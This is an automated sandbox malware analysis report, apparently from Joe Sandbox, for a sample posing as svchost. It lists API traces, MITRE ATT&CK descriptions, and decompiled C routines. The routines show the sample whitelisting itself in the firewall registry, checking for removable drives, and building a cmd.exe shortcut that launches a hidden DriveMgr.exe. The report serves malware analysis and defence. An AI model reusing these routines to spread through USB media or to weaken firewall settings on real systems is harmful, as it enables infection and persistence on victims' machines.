0x00ab5269
0x00ab5276
0x00ab5276
0x00ab5281
0x00ab529c
0x00ab52a1
0x00ab52aa
0x00ab52b2
0x00ab52bf
0x00ab52ce
0x00ab52dd
0x00ab52ec
0x00ab52fb
0x00ab530a
0x00ab5319
0x00ab531e
0x00ab533c
0x00ab535d
0x00ab537e
0x00ab539f
0x00ab53c0
0x00ab53e1
0x00ab5402
0x00ab540f
0x00ab540f
0x00ab541a
0x00ab542f
0x00ab543a
0x00ab544f
0x00ab545a
0x00ab5460
0x00ab5462
0x00ab5468
0x00ab5483
0x00ab5492
0x00ab5498
0x00ab54b3
0x00ab54be
0x00ab54ec
0x00ab550a
0x00ab550f
0x00ab5518
0x00ab5521
0x00ab5526
0x00ab5526
0x00ab54ad
0x00ab54ad
0x00ab547d
0x00ab547d
0x00ab5533
0x00ab5538
0x00ab554a
0x00ab554a
0x00ab5460
0x00ab4fa4
0x00ab4fbf
0x00ab4fc4
0x00ab4fcd
0x00ab4fd5
0x00ab4ff4
0x00ab4ff9
0x00ab5002
0x00ab5002
0x00ab501d
0x00ab5022
0x00ab502b
0x00ab5033
0x00ab5040
0x00ab504f
0x00ab505e
0x00ab5063
0x00ab5081
0x00ab50a2
0x00ab50c3
0x00ab50d0
0x00ab50d0
0x00ab50dd
0x00000000

APIs

Sleep.KERNEL32(000001F4), ref: 00AB4458
FindWindowA.USER32 ref: 00AB448B
Sleep.KERNEL32(000007D0), ref: 00AB44A9
DeleteFileA.KERNEL32(3r38r38r838r838r388r838r83), ref: 00AB44B4
DeleteFileA.KERNEL32(3r38r38r838r838r388r838r83), ref: 00AB44BF
Sleep.KERNEL32(000007D0), ref: 00AB44CA
DeleteFileA.KERNEL32(3r38r38r838r838r388r838r83), ref: 00AB44D5
MoveFileW.KERNEL32(w4rr4w4rw4rwr44rr4w4rr44r,w4rr4w4rw4rwr44rr4w4rr44r), ref: 00AB44E5
Sleep.KERNEL32(00000FA0), ref: 00AB4517
MoveFileW.KERNEL32(3r37grg73g7e37geg73g7eg73g7e,nw55n5nww5n5nww5nw5n5n5n5n), ref: 00AB4527
MoveFileW.KERNEL32(nw55n5nww5n5nww5nw5n5n5n5n,w4rr4w4rw4rwr44rr4w4rr44r), ref: 00AB4537
Sleep.KERNEL32(00000FA0), ref: 00AB4542
DeleteFileA.KERNEL32(3r38r38r838r838r388r838r83), ref: 00AB454D
Sleep.KERNEL32(000003E8), ref: 00AB455A
PathFileExistsW.SHLWAPI(3r37grg73g7e37geg73g7eg73g7e), ref: 00AB4B73
DeleteFileA.KERNEL32(3r38r38r838r838r388r838r83), ref: 00AB4B86
MoveFileW.KERNEL32(nw55n5nww5n5nww5nw5n5n5n5n,w4rr4w4rw4rwr44rr4w4rr44r), ref: 00AB4BBD
DeleteFileA.KERNEL32(3r38r38r838r838r388r838r83), ref: 00AB4BC8
Sleep.KERNEL32(00001388), ref: 00AB4BD5
FindWindowA.USER32 ref: 00AB4BE2
DeleteFileA.KERNEL32(3r38r38r838r838r388r838r83), ref: 00AB4BFC
SetForegroundWindow.USER32(?), ref: 00AB4C09
SetFocus.USER32(?), ref: 00AB4C16
DeleteFileW.KERNEL32(w4rr4w4rw4rwr44rr4w4rr44r), ref: 00AB4C21
MoveFileW.KERNEL32(w4rr4w4rw4rwr44rr4w4rr44r,3rm3mrk3kmr3mrl3mrm3mr3lmmrl3m), ref: 00AB4C31
Sleep.KERNEL32(000000C8), ref: 00AB4C3C
CloseWindow.USER32 ref: 00AB4C49
Sleep.KERNEL32(00000FA0), ref: 00AB4C54
DeleteFileW.KERNEL32(w4rr4w4rw4rwr44rr4w4rr44r), ref: 00AB4C86
MoveFileW.KERNEL32(nw55n5nww5n5nww5nw5n5n5n5n,w4rr4w4rw4rwr44rr4w4rr44r), ref: 00AB4C96
Sleep.KERNEL32(000001F4), ref: 00AB4CB7
memset.MSVCRT ref: 00AB4CCB
ExpandEnvironmentStringsW.KERNEL32(?,?,00000208,?,?,?,?,?,?,?,?,0000000A), ref: 00AB4CED
rand.MSVCRT ref: 00AB4CF3
rand.MSVCRT ref: 00AB4D07
rand.MSVCRT ref: 00AB4D1B
wsprintfW.USER32 ref: 00AB4D42
wsprintfW.USER32 ref: 00AB4D65
CreateDirectoryW.KERNEL32(?,00000000), ref: 00AB4D77
Sleep.KERNEL32(000003E8), ref: 00AB4D8A
CopyFileW.KERNEL32(?,?,00000000), ref: 00AB4DA0
Sleep.KERNEL32(000003E8), ref: 00AB4DB3
wsprintfW.USER32 ref: 00AB4DD3
SetFileAttributesW.KERNEL32(?,00000007), ref: 00AB4DE5
SetFileAttributesW.KERNEL32(?,00000007), ref: 00AB4DF4
RegOpenKeyExW.ADVAPI32(80000002,SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List,00000000,000F003F,?), ref: 00AB4E12
wcslen.MSVCRT ref: 00AB4E23
Sleep.KERNELBASE(000001F4,?,?,?,?,?,0000000A), ref: 00AB4F49
RegOpenKeyExA.KERNELBASE(80000002,00000000,?,?,?,?,?,?,0000000A), ref: 00AB4F72
RegSetValueExA.KERNELBASE(?,00000000,?,00000004,?,?,?,?,?,0000000A), ref: 00AB4FA4
RegOpenKeyExA.KERNELBASE(80000002,00000000,00000000,000F003F,?,?,?,?,?,?,0000000A), ref: 00AB4FCD
RegCreateKeyExA.ADVAPI32(80000002,00000000,00020006,00000000,?,00000000,?,?,?,?,?,0000000A), ref: 00AB5002
RegOpenKeyExA.KERNELBASE(80000002,00000000,?,00000000,000F003F,?,?,?,?,?,?,0000000A), ref: 00AB502B
RegSetValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004,?,?,?,?,00000000,000F003F,?), ref: 00AB5081

Strings

wgg4gwg4wgw4w4gw4gw4g4wghw4h, xrefs: 00AB4486
3r38r38r838r838r388r838r83, xrefs: 00AB44AF, 00AB44BA, 00AB44D0, 00AB4548
3r37grg73g7e37geg73g7eg73g7e, xrefs: 00AB4522
nw55n5nww5n5nww5nw5n5n5n5n, xrefs: 00AB451D, 00AB4532
n#, xrefs: 00AB4468
w4rr4w4rw4rwr44rr4w4rr44r, xrefs: 00AB44DB, 00AB44E0, 00AB452D

Memory Dump Source

Source File: 00000001.00000002.1647531107.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.1647519351.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.1647580242.0000000000AB6000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.1647620065.0000000000AB9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.1647653810.0000000000ABA000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.1647686167.0000000000ABB000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ab0000_svchost.jbxd

Similarity

API ID: File$Sleep$Delete$Move$OpenWindow$randwsprintf$AttributesCreateFindValue$CloseCopyDirectoryEnvironmentExistsExpandFocusForegroundPathStringsmemsetwcslen
String ID: 3r37grg73g7e37geg73g7eg73g7e$3r38r38r838r838r388r838r83$n#$nw55n5nww5n5nww5nw5n5n5n5n$w4rr4w4rw4rwr44rr4w4rr44r$wgg4gwg4wgw4w4gw4gw4g4wghw4h
API String ID: 3771346407-3591319307
Opcode ID: f82dc172f9a92c4cffeba9d1142695ad16561a7fe26f4c6e99d9b695f8471787
Instruction ID: 12722dacf6da3068528f56dda0d9fe404ebc2421ce6f7ff62946adeb4518d049
Opcode Fuzzy Hash: f82dc172f9a92c4cffeba9d1142695ad16561a7fe26f4c6e99d9b695f8471787
Instruction Fuzzy Hash: 4D214D35A40265EFDB20ABE5DC4EBDD7678BB08702F008794F34A611A3C7B40981CF12

Uniqueness

Uniqueness Score: -1.00%

Function 00AB2730, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 60
sleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00AB2730(WCHAR* _a4) {
				void* _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOW _v100;
				intOrPtr _v104;

				memset( &_v100, 0, 0x44);
				memset( &_v24, 0, 0x10);
				_v100.cb = 0x44;
				_v100.dwFlags = 1;
				_v100.wShowWindow = 5;
				if(CreateProcessW(0, _a4, 0, 0, 0, 0x20, 0, 0,  &_v100,  &_v24) != 1) {
					_v8 = ShellExecuteW(0, L"open", _a4, 0, 0, 0);
					_v104 = _v8;
					if(_v104 <= 0x20) {
						return 0;
					}
					Sleep(0x3e8);
					return 1;
				}
				Sleep(0x3e8);
				return 1;
			}

0x00ab273e
0x00ab274e
0x00ab2756
0x00ab275d
0x00ab2769
0x00ab2790
0x00ab27b8
0x00ab27be
0x00ab27c5
0x00000000
0x00ab27d6
0x00ab27cc
0x00000000
0x00ab27d2
0x00ab2797
0x00000000

APIs

memset.MSVCRT ref: 00AB273E
memset.MSVCRT ref: 00AB274E
CreateProcessW.KERNEL32 ref: 00AB2787
Sleep.KERNEL32(000003E8), ref: 00AB2797
ShellExecuteW.SHELL32(00000000,open,00AB1D08,00000000,00000000,00000000), ref: 00AB27B2
Sleep.KERNEL32(000003E8), ref: 00AB27CC

Strings

D, xrefs: 00AB2756
, xrefs: 00AB27C1
L!v, xrefs: 00AB27B2
open, xrefs: 00AB27AB

Memory Dump Source

Source File: 00000001.00000002.1647531107.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.1647519351.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.1647580242.0000000000AB6000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.1647620065.0000000000AB9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.1647653810.0000000000ABA000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.1647686167.0000000000ABB000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ab0000_svchost.jbxd

Similarity

API ID: Sleepmemset$CreateExecuteProcessShell
String ID: $D$open$L!v
API String ID: 3787208655-3862644752
Opcode ID: 8922469c8ff515a943acce539a01f1546ea99741337d5892f1032f1b300c9bf7
Instruction ID: d3440ec9892257aec7a1cd4f7d3d986af6670796fc2f5f7e6a4e5d306a0c2956
Opcode Fuzzy Hash: 8922469c8ff515a943acce539a01f1546ea99741337d5892f1032f1b300c9bf7
Instruction Fuzzy Hash: D7112171A80308BBEB10DF90DD46FDE7778AB14B01F200215FB056F2D2DAB5AA51C755

Uniqueness

Uniqueness Score: -1.00%

Function 00AB1D80, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00AB1D80(WCHAR* _a4) {
				int _v8;
				short _v1052;
				intOrPtr _v1056;

				_v8 = GetDriveTypeW(_a4);
				_v1056 = _v8;
				if(_v1056 >= 2) {
					if(_v1056 <= 3 || _v1056 == 6) {
						if(QueryDosDeviceW(_a4,  &_v1052, 0x208) != 0 && StrCmpNW( &_v1052, L"\\??\\", 4) == 0) {
							_v8 = 1;
						}
					}
				}
				return _v8;
			}

0x00ab1d93
0x00ab1d99
0x00ab1da6
0x00ab1daf
0x00ab1dd4
0x00ab1dee
0x00ab1dee
0x00ab1dd4
0x00ab1daf
0x00ab1dfb

APIs

GetDriveTypeW.KERNEL32(00AB1D5F), ref: 00AB1D8D
QueryDosDeviceW.KERNEL32(00AB1D5F,?,00000208), ref: 00AB1DCC
StrCmpNW.SHLWAPI(?,\??\,00000004), ref: 00AB1DE4

Strings

\??\, xrefs: 00AB1DD8

Memory Dump Source

Source File: 00000001.00000002.1647531107.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.1647519351.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.1647580242.0000000000AB6000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.1647620065.0000000000AB9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.1647653810.0000000000ABA000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.1647686167.0000000000ABB000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ab0000_svchost.jbxd

Similarity

API ID: DeviceDriveQueryType
String ID: \??\
API String ID: 1681518211-3047946824
Opcode ID: 8d5a90e8057135cbf5828cf554d2be633c6e3e641401876ff8caee0e7c77540f
Instruction ID: a9c343016585ab5ac5e61eafc95bef051cd35d5f97b6d6c10d63f1e89f69b091
Opcode Fuzzy Hash: 8d5a90e8057135cbf5828cf554d2be633c6e3e641401876ff8caee0e7c77540f
Instruction Fuzzy Hash: C40186B494020CEBCF20DF95CC58BD9B7B8AB05301F4081E8EA0497252D6759FC5CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00AB1EC0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 78
comCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E00AB1EC0(intOrPtr _a4, intOrPtr _a12, intOrPtr _a16) {
				void* _v8;
				void* _v12;
				char* _t29;

				_t29 =  &_v8;
				__imp__CoCreateInstance(0xab75dc, 0, 0x17, 0xab75bc, _t29);
				if(_t29 >= 0) {
					 *((intOrPtr*)( *((intOrPtr*)( *_v8 + 0x50))))(_v8, L"%windir%\\system32\\cmd.exe");
					 *((intOrPtr*)( *((intOrPtr*)( *_v8 + 0x44))))(_v8, _a12, _a16);
					 *((intOrPtr*)( *((intOrPtr*)( *_v8 + 0x3c))))(_v8, 7);
					 *((intOrPtr*)( *((intOrPtr*)( *_v8 + 0x2c))))(_v8, L"/c start __ & __\\DriveMgr.exe & exit");
					_push( &_v12);
					_push(0xab75cc);
					_push(_v8);
					if( *((intOrPtr*)( *((intOrPtr*)( *_v8))))() >= 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x18))))(_v12, _a4, 1);
						 *((intOrPtr*)( *((intOrPtr*)( *_v12 + 8))))(_v12);
					}
					return  *((intOrPtr*)( *((intOrPtr*)( *_v8 + 8))))(_v8);
				}
				return _t29;
			}

0x00ab1ec6
0x00ab1ed8
0x00ab1ee0
0x00ab1ef7
0x00ab1f0d
0x00ab1f1d
0x00ab1f30
0x00ab1f35
0x00ab1f36
0x00ab1f43
0x00ab1f4a
0x00ab1f5e
0x00ab1f6c
0x00ab1f6c
0x00000000
0x00ab1f7a
0x00ab1f7f

APIs

CoCreateInstance.OLE32(00AB75DC,00000000,00000017,00AB75BC,00000008,shell32.dll,00000008), ref: 00AB1ED8

Strings

/c start __ & __\DriveMgr.exe & exit, xrefs: 00AB1F1F
%windir%\system32\cmd.exe, xrefs: 00AB1EE6

Memory Dump Source

Source File: 00000001.00000002.1647531107.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.1647519351.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.1647580242.0000000000AB6000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.1647620065.0000000000AB9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.1647653810.0000000000ABA000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.1647686167.0000000000ABB000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ab0000_svchost.jbxd

Similarity

API ID: CreateInstance
String ID: %windir%\system32\cmd.exe$/c start __ & __\DriveMgr.exe & exit
API String ID: 542301482-2643104863
Opcode ID: b2dbfd9de47354abb50a0e69c939abaa221423d6550c0807d19e9db5cbdcba7b
Instruction ID: a6548a6a0356de068c0bffeafc05a968ca65202e8e85c320bff828bb92f1738e
Opcode Fuzzy Hash: b2dbfd9de47354abb50a0e69c939abaa221423d6550c0807d19e9db5cbdcba7b
Instruction Fuzzy Hash: D221B479744109EFC704DF98C991D9EB3BABF8C700B204298E6059B3A1DA71AE41DB50

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Data loss prevention, File monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Br6Pmt0MiZ.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Location Tracking:

Cryptography:

Phishing:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Network Port Distribution

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.
Tactics:	Impact
Data Sources:	File monitoring, Kernel drivers, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre